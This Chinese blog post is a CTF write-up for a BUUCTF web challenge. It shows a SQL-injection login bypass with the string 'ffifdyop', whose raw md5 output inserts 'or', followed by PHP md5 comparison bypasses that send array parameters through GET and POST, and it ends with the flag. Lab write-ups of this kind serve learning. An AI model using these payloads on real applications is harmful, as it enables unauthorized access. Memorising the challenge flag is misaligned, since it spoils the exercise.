当前位置:首页 » 《随便一记》 » 正文

BUUCTF

11 人参与  2022年04月05日 10:35  分类 : 《随便一记》  评论

点击全文阅读


题目就是一个很普通的表单,F12也看不到什么
在这里插入图片描述
随便填个数据抓包看一下
在这里插入图片描述

select * from 'admin' where password=md5($pass,true)

看来突破点是md5($pass, true)
md5($pass)的意思是计算$pass的MD5的值并返回十六进制格式,如果设置为true,将以二进制的形式返回,这里存在一个漏洞

$pass = ffifdyop的时候,md5($pass,true) => 'or'6xxxxx

<?php

$a = 'ffifdyop';
echo md5($a);
echo "\n";
echo md5($a, true);

?>

输出结果:
在这里插入图片描述
这样会导致原本的查询语言会变成:

select * from 'admin' where password= ''or 1	//永真

输入ffifdyop,登录成功
跳到这个页面
在这里插入图片描述
查看源代码:

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

payload:?a[]=1&b[]=2

到达以下页面:

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

payload:param1[]=1&param2[]=2
在这里插入图片描述
得到:flag{15332b95-2169-45b1-913a-063da23053ad}


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/37354.html

返回  页面  突破点  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1